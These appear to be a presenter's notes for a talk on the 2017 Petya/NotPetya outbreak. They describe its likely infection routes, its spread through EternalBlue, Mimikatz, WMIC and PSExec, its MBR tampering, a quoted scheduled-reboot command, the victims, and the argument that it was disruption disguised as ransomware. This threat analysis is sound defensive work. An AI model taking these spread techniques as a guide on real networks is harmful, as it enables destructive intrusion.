Petya and Weaponized Malware: Is Ransomware the New DDoS Attack?

Editor's Notes

• #3: Wait, before we go any further, movie plot time! The hero of our story starts their day as they typically might. Grabs a coffee and off to work. Drives to the metro station and jumps on a train into town. Part way through the day there is a disturbance in the office. A progression of employees chattering in the background. Moving around the office. Confused conversation. More and more heads pop up out of their cubes looking around and asking questions. Suddenly their computer blue screens and reboots. They see some text on the screen then suddenly a flashing red and black skull and crossbones screen comes up and ends with a red screen with white text comes up. The message explains the system have been encrypted and describes steps to unransom the system. After over an hour of confusion and lack of being able to get a response out of IT they decide to go out for lunch with some co workers. They need to stop and grab some cash at an ATM where a few people mill about around a screen with a now familiar red screen with white text. One of their colleagues offers to buy their lunch and they move on. They round the corner about to walk into their favorite café and walk in. The staff say they are sorry, but their systems are down and they cannot seat them because their systems are down and they cannot process cards or even open the till to exchange cash. The distinctive red screen looms in the background over the hostess shoulder. Across town banks, government offices, retail stores, shops, restaurants, coffee shops, are all experiencing the same issue. Even the train home is unavailable because the transit system was also hit. The Airport shuts down due to inability to process tickets, baggage, and more. Even shipping in and out of the country is affected. Enter Hollywood movie villain with demands.
• #4: Amber asks the question: So which is it really? Chris answers: Does it matter? Phil answers: Describe Petya
• #5: There are a few methods of initial infection reported. One of the most typcail in a ransomware campaign, phishing, has been corroborated by several sources and seems to be using a recent Office exploit that was resolved in the April Patch Tuesday release (CVE-2017-0199). This vulnerability existed in how Office would handle RTF documents. More alarming, though, is the likelihood that a small Ukranian financial tech company, MeDoc, could have been the source of the initial launch of the attack. Reports say that the firms tax software received an update on June 22nd and distributed a malicious payload to its clients that was part of the opening salvo of this attack. MeDoc is a financial tech company that makes accounting software to help people and businesses process taxes. Security researchers said that hackers seemed to have breached the company's computer systems and compromised a software update that was pushed to its customers on June 22.   From <http://fortune.com/2017/06/27/petya-ransomware-ukraine-medoc/>
• #6: From initial infection or once it has gained a foothold that is where Petya becomes notPetya. It uses a combination of EternalBlue (MS17-010) and WMIC and PSExec to spread to other systems using multiple options. Using Mimikatz to grab passwords that will be used by WMIC and PSExec to move about the network and spread. Then after spreading itself it encrypts the system files rendering the system unusable. It is using stronger encryption than most ransomware as well. This makes it near instantaneous unlike most Ransomware that encrypts all files on a system. The rapid spread and damage this causes is tremendous. MBR infection and encryption Once installed, Petya proceeds to modify the master boot record (MBR). This allows it to hijack the normal loading process of the infected computer during the next system reboot. The modified MBR is used to encrypt the hard disk while simulating a CHKDSK screen. It then displays a ransom note to the user. MBR modification does not succeed if the threat is executed as a normal user but the threat will still attempt to spread across the network  At this point, a system reboot is scheduled using the following command: "/c at 00:49 C:\Windows\system32\shutdown.exe /r /f" By scheduling and not forcing a reboot, it provides time to allow Petya to spread to other computers in the network before user-mode encryption occurs. File encryption Petya performs encryption in two ways: After Petya has spread to other computers, user-mode encryption occurs where files with a specific extension are encrypted on disk. The MBR is modified to add a custom loader which is used to load a CHKDSK  simulator. This simulator is used to hide the fact that disk encryption is occurring. This is done after user-mode encryption occurs and thus encryption is twofold: user mode and full disk.
• #7: There is a lot of speculation that Petya\NotPetya isn’t really an attack for financial gain. The collection part of Petya is what is definitely lacking. And after WannaCry and the lack of financial success there was really no financial motivation to do this. https://www.theregister.co.uk/2017/06/28/petya_notpetya_ransomware/ Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley, said Petya appears to have been well engineered to be destructive while masquerading as a ransomware strain. Weaver noted that Petya’s ransom note includes the same Bitcoin address for every victim, whereas most ransomware strains create a custom Bitcoin payment address for each victim. Also, he said, Petya urges victims to communicate with the extortionists via an email address, while the majority of ransomware strains require victims who wish to pay or communicate with the attackers to use Tor, a global anonymity network that can be used to host Web sites which can be very difficult to take down. https://krebsonsecurity.com/2017/06/petya-ransomware-outbreak-goes-global/#more-39734
• #8: Only vector for unlock code was already blocked with no redundancy for recovery making payouts less likely as well.   The intent of this attack was to disrupt entire companies at a time. It is very effective at company wide impact rather than lower numbers of systems affected.
• #9: Is Petya really ransomware? It does encrypt your system, but that is where the similarities stop. The attackers do not seem to care about the ransom as the collection portion of the attack is very weak. Looking at what was part of the initial launch of Petya\NotPetya. A local\regional ukranian software provider was utilized to hit a general target.   Rosneft - Russia’s top oil producer Rosneft said its servers had been hit been a large-scale cyber attack but its oil production was unaffected. A.P. Moller-Maersk - Danish shipping giant A.P. Moller-Maersk, which handles one out of seven containers shipped globally, said a cyber attack had caused outages at its computer systems across the world. APM Terminals - Maersk’s port operator. 17 shipping container terminals run by APM Terminals had been hacked, including two in Rotterdam and 15 in other parts of the world. WPP - Britain’s WPP, the world’s biggest advertising company, said computer systems within several of its agencies had been hit by a suspected cyber attack. Merck & Co. - Pharmaceutical company Merck & Co. said in a tweet its computer network was compromised as part of a global hack. Russian Banks - Russia’s central bank said there had been “computer attacks” on Russian banks and that in isolated cases their IT systems had been infected.  All Russian branches of Home Credit consumer lender are closed because of a cyber attack. Ukrainian Banks, Power Grid - A number of Ukrainian banks and companies, including the state power distributor, were hit by a cyber attack that disrupted some operations, the Ukrainian central bank said. Ukrainian International Airport - Yevhen Dykhne, director of the capital’s Boryspil Airport, said it had been hit. “In connection with the irregular situation, some flight delays are possible,” Dykhne said in a post on Facebook. Saint Gobain - French construction materials company Saint Gobain said it had been a victim of a cyber attack, and it had isolated its computer systems to protect data. Deutsche Post - German postal and logistics company Deutsche Post said systems of its Express division in the Ukraine have in part been affected by a cyber attack. Metro - Germany’s Metro said its wholesale stores in the Ukraine had been hit by a cyber attack and the retailer was assessing the impact. Mondelez International - Food company Mondelez International said employees in different regions were experiencing technical problems but it was unclear whether this was due to a cyber attack. Evraz - Russian steelmaker Evraz said its information systems had been hit by a cyber attack but its output was not affected. Unnamed Norway Companies - A ransomware cyber attack is taking place in Norway and is affecting an unnamed international company, says the Nordic country’s national security authority.   Immediate targets hit were a perfect mix of infrastructure, transit, finance, and shipping Many groups are agreeing in the assessment that this was a targeted and possibly sponsored attack. So the initial target being the Ukraine what can we consider the subsequent global impact to be?
• #10: https://www.symantec.com/connect/blogs/petya-ransomware-outbreak-here-s-what-you-need-know
• #11: Collateral damage? Additional secondary or tertiary targets? A combination? It is hard to say right now. I think the line was crossed a well known chocolate manufacturer had a facility brought down by this attack. Amber: chime in with "Don’t mess with my chocolate!"
• #12: What was new and different now vs 6 months ago? This was ransomware, but only the disruption and initial delivery. The spread is much more sophisticated and targeted at widespread impact. Local, unauthenticated access. Rapid compromise. The end game is not about money in this case. It is not the ransom it is the disruption. This is Ransomware as a DDoS attack, as a social disruptor, as an economic disruptor. This is bigger than anything we have seen before and really goes beyond any one of them. To say this is weaponized is becoming more accurate. It is targeted at decimating an economy, an infrastructure, and a social structure. Its epicenter was geographically targeted. This being a taste of the future of CyberAttacks. How does this change our perspective of Malware, ransomware, and threats in general? How do we protect our companies, our personal systems, and in general our personal lives?
• #13: Was this a real attack or just a proof of concept? Was wanna cry a the Alpha, is this the beta, and is the real thing yet to come?